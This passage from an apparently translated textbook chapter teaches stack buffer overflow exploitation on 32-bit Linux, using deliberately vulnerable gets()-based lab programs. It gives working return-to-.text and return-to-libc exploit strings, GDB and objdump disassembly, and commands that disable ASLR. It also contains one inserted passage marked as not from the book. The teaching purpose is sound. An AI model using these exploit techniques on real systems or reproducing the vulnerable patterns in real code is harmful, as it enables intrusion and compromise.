0x8048479 <main+9>: lea eax,[ebp-4]
0x804847c <main+12>: push eax
0x804847d <main+13>: lea eax,[ebp-20]
0x8048480 <main+16>: push eax
0x8048481 <main+17>: push 0x80485d0
0x8048486 <main+22>: call 0x804834c <printf@plt>
0x804848b <main+27>: add esp,0x10
0x804848e <main+30>: add esp,0xfffffff4
0x8048491 <main+33>: lea eax,[ebp-20]
0x8048494 <main+36>: push eax
0x8048495 <main+37>: call 0x804831c <gets@plt>
0x804849a <main+42>: add esp,0x10
0x804849d <main+45>: cmp DWORD PTR [ebp-4],0xd0a00
0x80484a4 <main+52>: jne 0x80484b6 <main+70>
0x80484a6 <main+54>: add esp,0xfffffff4
0x80484a9 <main+57>: push 0x80485e7
0x80484ae <main+62>: call 0x804834c <printf@plt>
0x80484b3 <main+67>: add esp,0x10
gdb$
The first column is the address at which the instruction is loaded in memory when the program runs. The second column is the offset relative to the first instruction of main. The third column is the assembly instruction itself.
According to the control-flow diagram, we need to find the branch containing the second call to printf. The second printf call is at address 080484AE, so the "equal" branch is the one containing this address. A few instructions above the call is a conditional jump, JNE, marking the branch point. The target of this jump is one branch, and the part after the jump is the other branch. Since the part after the jump contains the call we are looking at, the "equal" branch starts at address 080484A6.
To exit GDB, we enter the command quit.
3.4.3.2 With objdump
The objdump program provides information about an executable file in the ELF format (used on the Linux, BSD and Solaris operating systems). objdump can print assembly instructions like GDB when invoked with the -d option.
regular@exploitation:~/src$ objdump -d ./stack4
./stack4: file format elf32-i386
Disassembly of section .init:
080482e4 <_init>:
80482e4: 55 push %ebp
80482e5: 89 e5 mov %esp,%ebp
80482e7: 83 ec 08 sub $0x8,%esp
80482ea: e8 a5 00 00 00 call 8048394 <call_gmon_start>
80482ef: e8 3c 01 00 00 call 8048430 <frame_dummy>
80482f4: e8 77 02 00 00 call 8048570 <__do_global_ctors_aux>
80482f9: c9 leave
80482fa: c3 ret
The disassembly objdump provides covers the entire executable, rather than one function as we did with GDB. Searching through objdump's output, we find a fragment like the capture below.
08048470 <main>:
8048470: 55 push %ebp
8048471: 89 e5 mov %esp,%ebp
8048473: 83 ec 28 sub $0x28,%esp
8048476: 83 c4 fc add $0xfffffffc,%esp
8048479: 8d 45 fc lea 0xfffffffc(%ebp),%eax
804847c: 50 push %eax
804847d: 8d 45 ec lea 0xffffffec(%ebp),%eax
8048480: 50 push %eax
8048481: 68 d0 85 04 08 push $0x80485d0
8048486: e8 c1 fe ff ff call 804834c <printf@plt>
804848b: 83 c4 10 add $0x10,%esp
804848e: 83 c4 f4 add $0xfffffff4,%esp
8048491: 8d 45 ec lea 0xffffffec(%ebp),%eax
8048494: 50 push %eax
8048495: e8 82 fe ff ff call 804831c <gets@plt>
804849a: 83 c4 10 add $0x10,%esp
804849d: 81 7d fc 00 0a 0d 00 cmpl $0xd0a00,0xfffffffc(%ebp)
80484a4: 75 10 jne 80484b6 <main+0x46>
80484a6: 83 c4 f4 add $0xfffffff4,%esp
80484a9: 68 e7 85 04 08 push $0x80485e7
80484ae: e8 99 fe ff ff call 804834c <printf@plt>
80484b3: 83 c4 10 add $0x10,%esp
The first column is the instruction address, as in GDB's output. The second column is the machine code corresponding to the assembly instruction in the third column. The biggest difference between objdump's output and GDB's is that objdump uses AT&T syntax. In AT&T syntax, the source operand comes before the destination operand.
Applying the same reasoning as with GDB, we again find that the "equal" branch starts at address 080484A6.
3.4.4 Returning into the function body itself
We have now determined the address we want the epilog to return to. This address must be placed in the right stack slot, as illustrated in Figure 3.7.
To reach this state, the input string must be long enough to fill buf (10 bytes), spill over cookie (4 bytes), pass the slot holding the old EBP value (4 bytes), and its last four characters must have ASCII codes A6, 84, 04, and 08 respectively. Fortunately for us, none of these four characters is the newline character. So we need 18 (hexadecimal) filler characters and the 4 final characters as stated.
    regular@exploitation:~/src$ python -c 'print "a"*0x18 + "\xA6\x84\x04\x08"' | ./stack4
    &buf: 0xbffffa44, &cookie: 0xbffffa54
    You win!
    Segmentation fault
    regular@exploitation:~/src$
We can also use address 080484A9 instead of 080484A6, since it does not change the result of the printf call. However, we cannot return straight to the printf call at address 080484AE, because the argument passed to printf has not been set up. That argument is set up by the PUSH instruction before it, at address 080484A9.
Figure 3.7: The state to reach (figure: the return-address slot holds A6 84 04 08, above old ebp, cookie, and the four slots of buf)
    regular@exploitation:~/src$ python -c 'print "a"*0x18 + "\xA9\x84\x04\x08"' | ./stack4
    &buf: 0xbffffa44, &cookie: 0xbffffa54
    You win!
    Segmentation fault
    regular@exploitation:~/src$
The exploitation method we have just examined is called the return-to-.text technique. An executable file in the ELF format has many sections. The .text section holds all the code generated by the compiler, which the processor executes. This technique is quite important because sometimes the code we need to run is already present in the program, so we only need to find the address of that code to exploit the bug successfully, as in the example discussed here.
Through this example, the reader may also notice the following points:
1. We must understand very thoroughly how the program works, including the libraries it uses. Without knowing gets well, we would not have recognized that the newline character is converted into the string terminator, which is the reason exploitation the old way did not succeed.
2. If the program has countermeasures that prevent or limit exploitation, we are better off looking for a different exploitation method rather than trying to make the old method work.
3. There are many ways to exploit one bug. As in this example, we could use either of two addresses in the "equal" branch to return to.
    #include <stdio.h>

    int main()
    {
        int cookie;
        char buf[16];
        printf("&buf: %p, &cookie: %p\n", buf, &cookie);
        gets(buf);
        if (cookie == 0x000D0A00)
        {
            printf("You lose!\n");
        }
    }
Listing 3.6: stack5.c
3.5 Returning into the standard library
In the previous examples, we took advantage of code already present in the program to print You win!. In Listing 3.6, we no longer see code that performs the desired action. Instead of printing You win!, Listing 3.6 prints You lose!. Nevertheless, our goal remains unchanged.
3.5.1 Placing data in the program's memory
With that observation, the first thing we need to do is bring the string You win! into the program's memory and determine the address of that memory.
Stop and think
How many ways can the reader think of?
Every process in the Linux operating system is given a memory space completely separate from other processes, even though they may share the same linear addresses. These linear addresses are mapped to physical memory addresses by the virtual memory manager, as discussed in Subsection 2.2.3.1.
Although separate, some data of the parent process is copied into the child process's memory when the operating system loads the child into memory. These data include:
1. Environment variables.
2. The name of the executable file.
3. Command-line arguments.
    #include <stdio.h>
    #include <stdlib.h>   /* getenv */

    int main()
    {
        printf("%08x\n", getenv("EGG"));
        return 0;
    }
Listing 3.7: getenv.c
3.5.1.1 Environment variables
Environment variables are placed at the end of the region reserved for the stack. Environment variables are inherited from the parent process by the child process. Although the order (and hence the position) of the environment variables can change when their number or their contents change, the child process usually receives all of the parent's environment variables.
For example, we often use the following commands to set the environment variable JAVA_HOME.
    JAVA_HOME=/opt/jdk1.6.0
    export JAVA_HOME
After they run, the environment variable JAVA_HOME is assigned the value /opt/jdk1.6.0 and is inherited by child processes. This is why subsequent Java processes all know where the Java root directory is.
This means that if we set an environment variable to the value You win!, we will have passed this string into the memory of every process started afterwards.
    EGG='You win!'
    export EGG
To find the address of this string in memory, we can use the small program listed in Listing 3.7. When run, the program prints the address of the string You win!.
    regular@exploitation:~/src$ gcc -o getenv getenv.c
    regular@exploitation:~/src$ ./getenv
    bffffc36
    regular@exploitation:~/src$
Because the positions of environment variables are very sensitive to their values, to make sure every process holds the string You win! at address BFFFFC36 we must ensure that nothing about the environment variables changes between runs of the program. One unintended change that we rarely pay attention to is a change of the current directory. Note the change in the address of the very same environment variable in the capture below.
54 CHNG 3. TRN B M
regular@exploitation:~/src$ cp getenv ..
regular@exploitation:~/src$ cd ..
regular@exploitation:~$ ./getenv
bffffc3a
regular@exploitation:~$
Not only that, the length of the command line also affects the position of the environment variables.
regular@exploitation:~/src$ ./getenv
bffffc36
regular@exploitation:~/src$ ././getenv
bffffc32
regular@exploitation:~/src$ ./././getenv
bffffc2e
regular@exploitation:~/src$ cp getenv ge
regular@exploitation:~/src$ ./ge
bffffc3e
regular@exploitation:~/src$
Observing how the value changes, we can see a simple rule: the address of the environment variable's value decreases by 2 when the command line grows by 1 character. Adding 2 characters to ./getenv to get ././getenv lowers the position by 4 to BFFFFC32. Removing 4 characters from ./getenv to get ./ge raises the position by 8 to BFFFFC3E.
A word about ASLR
The reader should note that our working environment does not have address space layout randomization (ASLR) enabled, so the addresses we find will not change between runs of the program.
regular@exploitation:~/src$ cat /proc/sys/kernel/randomize_va_space
0
regular@exploitation:~/src$
When this feature is on, the operating system moves memory blocks to different places each time the program is executed. Consequently, addresses change from run to run.
regular@exploitation:~/src$ sudo sh -c 'echo 1 > /proc/sys/kernel/randomize_va_space'
regular@exploitation:~/src$ cat /proc/sys/kernel/randomize_va_space
1
regular@exploitation:~/src$ ./getenv
bf987c36
regular@exploitation:~/src$ ./getenv
bfcc6c36
regular@exploitation:~/src$ sudo sh -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
regular@exploitation:~/src$
3.5.1.2 The executable's file name
The executable's file name is placed on the stack just like the environment variables. We can take advantage of this to put a string into the program's memory by renaming the program to the desired string with the mv command.
mv stack5 'You win!'
3.5.1.3 Command-line arguments
Like the file name, command-line arguments are also passed to the program through the stack. So we can invoke the program with the argument You win! as follows.
./stack5 'You win!'
Determining the addresses of the argument string and of the program name (both are elements of the argv array in a C program) is left as a small puzzle for the reader.
3.5.1.4 The variable buf itself
The program reads input, and we can perfectly well type the string You win! into it! The input string is stored in the variable buf. Better still, in this example the address of buf is printed on the screen for us.
regular@exploitation:~/src$ ./stack5
&buf: 0xbffffa34, &cookie: 0xbffffa44
You win!
regular@exploitation:~/src$
In the screenshot above, the variable buf lies at address BFFFFA34.
3.5.2 Returning to the printf call
Once the string to print is in memory and we know its address, we only need to pass that address as the argument to printf to reach our goal. Let us look at the assembly instructions used to print the string You lose!.
regular@exploitation:~/src$ gdb ./stack5
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
gdb$ disassemble main
Dump of assembler code for function main:
0x08048470 <main+0>: push ebp
0x08048471 <main+1>: mov ebp,esp
0x08048473 <main+3>: sub esp,0x28
0x08048476 <main+6>: add esp,0xfffffffc
0x08048479 <main+9>: lea eax,[ebp-4]
0x0804847c <main+12>: push eax
0x0804847d <main+13>: lea eax,[ebp-20]
0x08048480 <main+16>: push eax
0x08048481 <main+17>: push 0x80485d0
0x08048486 <main+22>: call 0x804834c <printf@plt>
0x0804848b <main+27>: add esp,0x10
0x0804848e <main+30>: add esp,0xfffffff4
0x08048491 <main+33>: lea eax,[ebp-20]
0x08048494 <main+36>: push eax
0x08048495 <main+37>: call 0x804831c <gets@plt>
0x0804849a <main+42>: add esp,0x10
0x0804849d <main+45>: cmp DWORD PTR [ebp-4],0xd0a00
0x080484a4 <main+52>: jne 0x80484b6 <main+70>
0x080484a6 <main+54>: add esp,0xfffffff4
0x080484a9 <main+57>: push 0x80485e7
0x080484ae <main+62>: call 0x804834c <printf@plt>
0x080484b3 <main+67>: add esp,0x10
0x080484b6 <main+70>: mov esp,ebp
0x080484b8 <main+72>: pop ebp
0x080484b9 <main+73>: ret
0x080484ba <main+74>: nop
0x080484bb <main+75>: nop
0x080484bc <main+76>: nop
0x080484bd <main+77>: nop
0x080484be <main+78>: nop
0x080484bf <main+79>: nop
End of assembler dump.
gdb$
Before the CALL instruction, the PUSH at address 080484A9 pushes the address of the string You lose! onto the stack. We can check exactly what string sits at 080485E7 with the x/s command.
gdb$ x/s 0x80485e7
0x80485e7 <_IO_stdin_used+27>: "You lose!\n"
gdb$
Thus, just before the CALL at 080484AE, the top of the stack must hold the address of the string to be printed. This observation gives us the idea of returning directly to address 080484AE, provided we can place the address of the string You win! at the top of the stack. With this method, the stack state we need to reach is similar to Figure 3.7, except that the return address has the value 080484AE.
#include <stdio.h>

int main()
{
    printf("You win!");
    *(int *) 0 = 0;      /* deliberately crash the program with a write to address 0 */
}
Source 3.8: scratch.c
What remains is to find where the top of the stack is after main returns to address 080484AE. For main to return to CALL printf, before the RET in main's epilogue executes, the stack pointer must point at the stack slot holding that return address. After RET executes, the stack pointer moves up one slot, as shown in Figure 3.8, and the instruction pointer points to the desired location.
Having determined the top of the stack, we will put the address of the string You win! there. To simplify finding the address, we pass the string You win! to the program by typing it into buf. The string's address is then BFFFFA34, as discussed above, and the stack state to achieve is shown in Figure 3.9.
In summary, we need a string that begins with You win!, followed by the string terminator, then 7 arbitrary characters to fill up buf, then 4 characters to fill cookie, 4 more to overwrite the saved EBP, the address of the CALL printf instruction, and finally the address of buf. In other words, we need 1 + 7 + 4 + 4 = 10 (hexadecimal) string terminators (ASCII code 00) to fill the gap.
regular@exploitation:~/src$ python -c 'print "You win!" + "\x00"*0x10 + "\xAE\x84\x04\x08\x34\xFA\xFF\xBF"' | ./stack5
&buf: 0xbffffa34, &cookie: 0xbffffa44
Segmentation fault
regular@exploitation:~/src$
We do not get the string You win! on the screen!

Stop and think
Despite the sound calculation, our exploit string seems to have no effect. Can you explain why?
3.5.3 Looking for the stolen string
Before investigating the problem with the exploit, let us examine a short piece of code like the one in Source 3.8. If we compile and run that code, all we get is an error message.
Figure 3.8: Stack state before and after RET. Slots from high to low addresses: ..., XX XX XX XX, AE 84 04 08, old ebp, cookie, buf (four slots), ... (a) ESP points at the slot holding the return address AE 84 04 08. (b) After RET the stack pointer has moved up one slot, to XX XX XX XX.
Figure 3.9: Stack state to achieve. Slots from high to low addresses: 34 FA FF BF (&buf), AE 84 04 08 (return address), old ebp, cookie, buf, 00 XX XX XX, 77 69 6E 21 ("win!"), 59 6F 75 20 ("You "), the last of these at BFFFFA34.
regular@exploitation:~/src$ ./scratch
Segmentation fault
regular@exploitation:~/src$
The text You win! quietly disappears, exactly like the problem we ran into. Is printf being skipped?
To check whether printf is called with the correct argument, we can use the ltrace tool, which traces every dynamic library call made while an application executes.
regular@exploitation:~/src$ ltrace ./scratch
__libc_start_main(0x8048440, 1, 0xbffffab4, 0x80484c0, 0x8048470 <unfinished ...>
__register_frame_info(0x804958c, 0x804969c, 0xbffffa08, 0x8048370, 0xb7fdaff4) = 0
printf("You win!") = 8
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
regular@exploitation:~/src$
The trace shows that printf is in fact called with the right argument and behaves correctly.
So the reason can only lie inside printf itself. And indeed it does. printf stores the string to be printed in a buffer. Only when it encounters a newline, or the buffer has grown large (a few kilobytes), or the program terminates normally without an error, does printf send the contents to the screen.
To verify this, we can repeat the experiment with a small change to the source code. We add a newline character to the end of the string You win!, as in Source 3.9. And the string is now printed.
#include <stdio.h>

int main()
{
    printf("You win!\n");
    *(int *) 0 = 0;      /* deliberately crash the program with a write to address 0 */
}
Source 3.9: scratch.c, modified
regular@exploitation:~/src$ ./scratch
You win!
Segmentation fault
regular@exploitation:~/src$
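As an added example that is not part of the book, the following C program reproduces the buffering behaviour just described with a memory-backed stream, so the state of the "screen" can be checked at each step; it assumes a POSIX libc that provides fmemopen, and the function names are my own.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Added example, not from the book. It reproduces what made "You win!"
 * vanish from scratch.c: stdio keeps printf output in a buffer until a
 * flush, and a process killed by SIGSEGV never gets to flush. Instead of
 * stdout we write to a FILE backed by a memory array (fmemopen, POSIX),
 * so the backing store can be inspected at any moment; the buffering
 * rules are the same ones that apply to stdout. */

#define STORE_SIZE 64

/* Writes "You win!" (no '\n', exactly like scratch.c) to a stream in the
 * given buffering mode (_IOFBF or _IONBF), optionally calling fflush(),
 * and returns how many bytes have actually reached the backing store at
 * the point where scratch.c crashes. Returns -1 if the stream cannot be
 * created. */
static int bytes_visible(int mode, int do_flush)
{
    char store[STORE_SIZE];
    memset(store, 0, sizeof store);           /* constructed, empty "screen" */
    FILE *f = fmemopen(store, sizeof store, "w");
    if (f == NULL)
        return -1;
    setvbuf(f, NULL, mode, 0);                /* must precede any I/O */
    fprintf(f, "You win!");
    if (do_flush)
        fflush(f);
    int visible = (int) strlen(store);        /* a SIGSEGV here freezes this state */
    fclose(f);
    return visible;
}

/* Full buffering, the stdout default when output is a pipe or a file:
 * nothing has been delivered yet, so a crash now loses the text (0). */
int bytes_visible_without_flush(void) { return bytes_visible(_IOFBF, 0); }

/* Same, but with an explicit fflush() before the risky code: 8 bytes. */
int bytes_visible_after_fflush(void) { return bytes_visible(_IOFBF, 1); }

/* Unbuffered stream (setvbuf with _IONBF), the usual choice for diagnostic
 * output that must survive a crash: delivered immediately, 8 bytes. */
int bytes_visible_unbuffered(void) { return bytes_visible(_IONBF, 0); }

int main(void)
{
    printf("fully buffered, no flush: %d bytes delivered\n", bytes_visible_without_flush());
    printf("fully buffered, fflush:   %d bytes delivered\n", bytes_visible_after_fflush());
    printf("unbuffered:               %d bytes delivered\n", bytes_visible_unbuffered());
    return 0;
}
```

Note that the newline remedy of Source 3.9 relies on stdout being line buffered, which is only the case on a terminal; when output goes through a pipe, as in the exploit commands on this page, stdout is fully buffered and a newline alone does not flush it.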
3.5.4 Back to the example
Returning to the example under consideration, we use ltrace to verify whether printf is called with the desired argument.
First, we must find the address of buf when the vulnerable program runs under ltrace.
regular@exploitation:~/src$ ltrace ./stack5
__libc_start_main(0x8048470, 1, 0xbffffab4, 0x8048510, 0x80484c0 <unfinished ...>
__register_frame_info(0x80495f4, 0x8049708, 0xbffffa08, 0x80483a0, 0xb7fdaff4) = 0
printf("&buf: %p, &cookie: %p\n", 0xbffffa24, 0xbffffa34&buf: 0xbffffa24, &cookie: 0xbffffa34
) = 38
gets(0xbffffa24, 0xbffffa24, 0xbffffa34, 0x80482f9, 1
) = 0xbffffa24
__deregister_frame_info(0x80495f4, 0xb7fdb300, 0, 0xb8000cc0, 0xbffffa38) = 0
+++ exited (status 36) +++
regular@exploitation:~/src$
The printed address of buf is BFFFFA24, so our input string changes slightly. And instead of piping it straight into the program, we write it to a file for use with ltrace.
regular@exploitation:~/src$ python -c 'print "You win!" + "\x00"*0x10 + "\xAE\x84\x04\x08\x24\xFA\xFF\xBF"' > exp
regular@exploitation:~/src$ ltrace ./stack5 < exp
__libc_start_main(0x8048470, 1, 0xbffffab4, 0x8048510, 0x80484c0 <unfinished ...>
__register_frame_info(0x80495f4, 0x8049708, 0xbffffa08, 0x80483a0, 0xb7fdaff4) = 0
printf("&buf: %p, &cookie: %p\n", 0xbffffa24, 0xbffffa34&buf: 0xbffffa24, &cookie: 0xbffffa34
) = 38
gets(0xbffffa24, 0xbffffa24, 0xbffffa34, 0x80482f9, 1) = 0xbffffa24
printf("You win!") = 20
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
regular@exploitation:~/src$
Just as calculated, the string You win! really is passed to printf as expected. But because there is no newline at the end, it is not printed to the screen. We have to think of another way.

Stop and think
Suppose we did have a newline at the end of the string; we would still not get the desired output if the string were placed at the start of buf as it is now. Does the reader know why? (footnote 4)
3.5.5 Calling an external program
3.5.5.1 When the program name is a
Besides printf, functions such as strlen, atoi and several others also take the address of a string as their argument. Since printf cannot help us reach the goal, we need to consider using these functions. One function of interest is system, which executes a command in a shell. For example, calling system("ls") is the same as typing the command ls into the sh shell.
We have now found another path to the goal, as illustrated in Figure 3.10. First we create a simple shell script that prints the string You win!, then find a way to have it executed through system.
Let us name this shell script a and make it executable. We also make sure it works as intended.
#!/bin/sh
echo You win!
Source 3.10: a
regular@exploitation:~/src$ chmod u+x a
regular@exploitation:~/src$ ./a
You win!
regular@exploitation:~/src$
As in the earlier examples of returning to CALL printf, we would need to find the address of a call to system in the program. Unfortunately, our program has no call to system at all.
However, recall that CALL really does two things: it pushes the return address onto the stack, and it jumps to the address given by its operand. The first makes the top of the stack point at the return address. The second changes the instruction pointer, and is the essence of CALL. To replace the CALL, we must find the address of its operand, that is, the address of the system function.
Footnote 4: The reason will be explained in Subsection 3.5.5.2.
Figure 3.10: Returning to the system function (flowchart: in main, prologue, printf, gets, then the test cookie = 000D0A00? with yes leading to printf and no skipping it; main's epilogue then flows into system's prologue, body and epilogue).
Like printf, system is a function in the standard library, so even though the program does not use system directly, the function is loaded into memory when the library is loaded. To find the address of system, we turn to GDB.
regular@exploitation:~/src$ gdb ./stack5
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
gdb$ break main
Breakpoint 1 at 0x8048476
gdb$ run
Failed to read a valid object file image from memory.
--------------------------------------------------------------------------[regs]
EAX: BFFFFAA4 EBX: B7FDAFF4 ECX: B7EC2E6D EDX: 00000001 o d I t S z a P c
ESI: 00000000 EDI: B8000CC0 EBP: BFFFFA28 ESP: BFFFFA00 EIP: 08048476
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
[007B:BFFFFA00]----------------------------------------------------------[stack]
BFFFFA50 : 30 FA FF BF 6D 2E EC B7 - 00 00 00 00 00 00 00 00 0...m...........
BFFFFA40 : F4 AF FD B7 00 00 00 00 - C0 0C 00 B8 78 FA FF BF ............x...
BFFFFA30 : 01 00 00 00 A4 FA FF BF - AC FA FF BF 00 00 00 00 ................
BFFFFA20 : 00 00 00 00 C0 0C 00 B8 - 78 FA FF BF A8 2E EC B7 ........x.......
BFFFFA10 : 8C 8C EB B7 F4 AF FD B7 - 00 00 00 00 F4 AF FD B7 ................
BFFFFA00 : 01 00 00 00 A4 FA FF BF - 28 FA FF BF 29 85 04 08 ........(...)...
[0073:08048476]-----------------------------------------------------------[code]
0x8048476 <main+6>: add esp,0xfffffffc
0x8048479 <main+9>: lea eax,[ebp-4]
0x804847c <main+12>: push eax
0x804847d <main+13>: lea eax,[ebp-20]
0x8048480 <main+16>: push eax
0x8048481 <main+17>: push 0x80485d0
0x8048486 <main+22>: call 0x804834c <printf@plt>
0x804848b <main+27>: add esp,0x10
--------------------------------------------------------------------------------
Breakpoint 1, 0x08048476 in main ()
gdb$ print system
$1 = {<text variable, no debug info>} 0xb7ee3990 <system>
gdb$
The command break main sets a breakpoint at the program's main function. The command run executes the program. When the program runs, main is called, and the breakpoint we set stops the program right at the start of main. At this point the program has been fully loaded into memory, so the standard library has been loaded too. Finally we use print system to print the address of the system function, which is B7EE3990.
We can put this address into the stack slot holding main's return address, so that when main finishes it jumps directly to system. The remaining question is which stack slot holds system's argument.
Figure 3.11: Stack state for returning to the system function. From &buf = BFFFFA34 upward: 2E 2F 61 00 ("./a"), three more slots of buf, cookie, old ebp, 90 39 EE B7 (address of system), XX XX XX XX (system's return address), 34 FA FF BF (system's argument, &buf).
The reader will notice that the difference between returning to a call instruction and returning directly to the function is exactly one extra stack slot. When returning to the call instruction, the first action of CALL moves the stack pointer down one slot before the instruction pointer moves to the function's address. When returning directly to the function, the stack pointer keeps its position; only the instruction pointer is changed to point at the function.
In both cases, when the instruction pointer reaches the function's prologue, the stack pointer points at the slot holding that function's return address. Therefore, by the stack layout model in Figure 2.11, the function's first argument is the slot immediately above the top of the stack. And the current top of the stack is the slot immediately above main's return address, as examined in the previous example, in Subsection 3.4.4.
We now have all the ingredients to exploit the bug through an external program. We will enter the string ./a, followed by a string terminator, then C (hexadecimal) arbitrary characters to fill up buf, 4 more to fill cookie, 4 more to overwrite the saved EBP, then 4 characters with ASCII codes 90, 39, EE and B7 giving the address of system, 4 arbitrary characters for system's return address, and 4 characters with ASCII codes 34, FA, FF and BF giving the location of buf. Figure 3.11 depicts the stack state to achieve. When we run the exploit, we get a result like the following screenshot.
regular@exploitation:~/src$ python -c 'print "./a" + "\x00"*(1+0x0C+4+4) + "\x90\x39\xEE\xB7" + "aaaa" + "\x34\xFA\xFF\xBF"' | ./stack5
&buf: 0xbffffa34, &cookie: 0xbffffa44
You win!
Segmentation fault
regular@exploitation:~/src$
We have succeeded with a new exploitation method. Returning directly to a function in the standard library (such as system) is called return to libc. This method has two main advantages:
• The standard library contains a great many functions; most programs use it for one purpose or another, and in doing so they inadvertently link in even functions they do not need, such as system.
• Return to libc does not run into the barriers on code executability that methods returning into other data regions face.
3.5.5.2 When the program name is abc
This part simply extends what we discussed previously. The question here is: if the external program is named abc instead of a, what do we need to change to get the same result?
Simple enough: we just replace ./a with ./abc and remove 2 bytes of padding from the exploit command, as follows.
regular@exploitation:~/src$ mv a abc
regular@exploitation:~/src$ python -c 'print "./abc" + "\x00"*(1+0x0C+4+4-2) + "\x90\x39\xEE\xB7" + "aaaa" + "\x34\xFA\xFF\xBF"' | ./stack5
&buf: 0xbffffa34, &cookie: 0xbffffa44
sh: ./ab: No such file or directory
Segmentation fault
regular@exploitation:~/src$
We do not get the desired text! Instead, we get an error saying that the file ./ab was not found. Notably, ./ab seems to come from ./abc. To check, we replace ./abc with ./defg and expect the error to become file ./de not found.
regular@exploitation:~/src$ python -c 'print "./defg" + "\x00"*(1+0x0C+4+4-3) + "\x90\x39\xEE\xB7" + "aaaa" + "\x34\xFA\xFF\xBF"' | ./stack5
&buf: 0xbffffa34, &cookie: 0xbffffa44
sh: ./de: No such file or directory
Segmentation fault
regular@exploitation:~/src$
Indeed, the program seems to take only the first two characters of the file name passed in. So the simplest way to force the program to execute the file abc when we can only use two characters is to create a soft link to abc. The following screenshot creates a soft link named de pointing to abc and runs the exploit exactly as above.
regular@exploitation:~/src$ ln -s abc de
regular@exploitation:~/src$ python -c 'print "./defg" + "\x00"*(1+0x0C+4+4-3) + "\x90\x39\xEE\xB7" + "aaaa" + "\x34\xFA\xFF\xBF"' | ./stack5
&buf: 0xbffffa34, &cookie: 0xbffffa44
You win!
Segmentation fault
regular@exploitation:~/src$
Although the goal is achieved, we still have not explained why system receives only the first two characters.

Stop and think
The reader may try dropping the leading ./ to save 2 more characters. Remember to set the PATH environment variable to point at the directory containing this file, and be careful about the change in the address of buf.

Stop and think
Try to think about the reason for the truncation.
When the instruction pointer reaches system's prologue, the stack pointer points at the slot just above main's return address. system's prologue sets up a stack frame for system by decreasing ESP, making ESP point at some slot further down, as discussed in Subsection 2.3.1. system's local variables are stored in this stack frame, and they overlap the data in buf. In this case, system apparently uses 24 (decimal) bytes, so only the first 4 bytes of buf survive, which leads to the truncation we see. Figure 3.12 illustrates system's stack frame overlapping main's old stack frame when we try to execute ./abc. The left side shows memory right after the RET in main's epilogue; the right side shows the slots used by system.
To keep our data from being overwritten, we must put it somewhere else. We can place the string ./abc after buf instead of before it, as in the screenshot below.
Figure 3.12: system's stack frame overlapping the variable buf. Left, just after the RET in main's epilogue, from high to low addresses: 34 FA FF BF (system's argument), 61 61 61 61 (system's return address, where ESP points), 90 39 EE B7 (the slot that held main's return address), 00 00 00 00 (four slots: old ebp, cookie and the top of buf), 63 00 00 00, 2E 2F 61 62 at &buf = BFFFFA34. Right, inside system: its frame takes the six slots from 90 39 EE B7 down to 63 00 00 00, leaving only 2E 2F 61 62 ("./ab") intact.
regular@exploitation:~/src$ python -c 'print "\x00"*(0x10+4+4) + "\x90\x39\xEE\xB7" + "aaaa" + "\x58\xFA\xFF\xBF./abc\x00"' | ./stack5
&buf: 0xbffffa34, &cookie: 0xbffffa44
You win!
Segmentation fault
regular@exploitation:~/src$
Because we moved the string to the back, its address is BFFFFA34 + 24 = BFFFFA58, that is, the address of buf plus the distance from buf to the string ./abc. buf itself is filled with arbitrary characters. See Figure 3.13.
Alternatively, we can use an environment variable as follows.
regular@exploitation:~/src$ export EGG=./abc
regular@exploitation:~/src$ ./getenv
bffffc39
regular@exploitation:~/src$ python -c 'print "\x00"*(0x10+4+4) + "\x90\x39\xEE\xB7" + "aaaa" + "\x39\xFC\xFF\xBF"' | ./stack5
&buf: 0xbffffa34, &cookie: 0xbffffa44
You win!
Segmentation fault
regular@exploitation:~/src$
The reader should note that because getenv and stack5 have the same length (6 characters each), the address reported by getenv can be used directly with stack5 without adjustment. Using an environment variable seems more convenient than what we did before.
Figure 3.13: Placing ./abc at the end of the string. From &buf = BFFFFA34 upward: six slots of 00 00 00 00 (buf, cookie, old ebp), 90 39 EE B7 (address of system), 61 61 61 61 (system's return address), 58 FA FF BF (system's argument), then 2E 2F 61 62 and 63 00 XX XX ("./abc") starting at BFFFFA58.
3.6 Returning to libc multiple times
There is one unpleasant point about the exploit commands we have looked at. Although we print the string we want, we also make the program hit a segmentation fault. In well-designed programs, such an error alerts the administrator and makes exploitation considerably harder. Let us consider such a program in Source 3.11.
In fact this program merely adds a SIGSEGV signal handler that prints You still lose! on the screen. The operating system sends SIGSEGV to a program when it commits a segmentation fault.
First, we need to understand why our exploit commands make the program segfault. Recall that we used return to libc to force main to jump to system on exit. Like many other functions, when system finishes its task it must return to its caller. In Figure 3.13, system's return address is 61616161. That address is normally not mapped into memory, so when the instruction pointer returns there, the program cannot fetch an instruction from memory, causing a segmentation fault.
To get around the error, we must force system to return to an instruction, or a function, that terminates the program rather than returning to its caller in turn.
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>

void segv_handler(int signal)
{
    printf("You still lose!\n");
    abort();
}

void init()
{
    signal(SIGSEGV, segv_handler);
}

int main()
{
    int cookie;
    char buf[16];
    init();
    printf("&buf: %p, &cookie: %p\n", buf, &cookie);
    gets(buf);              /* the deliberate overflow: gets() has no bound */
    if (cookie == 0x000D0A00)
    {
        printf("You lose!\n");
    }
}
Source 3.11: stack6.c
One function that does not return is exit. exit terminates a program with the exit code passed as its argument. Since we do not care about the program's exit code, we need not care about the function's argument either.
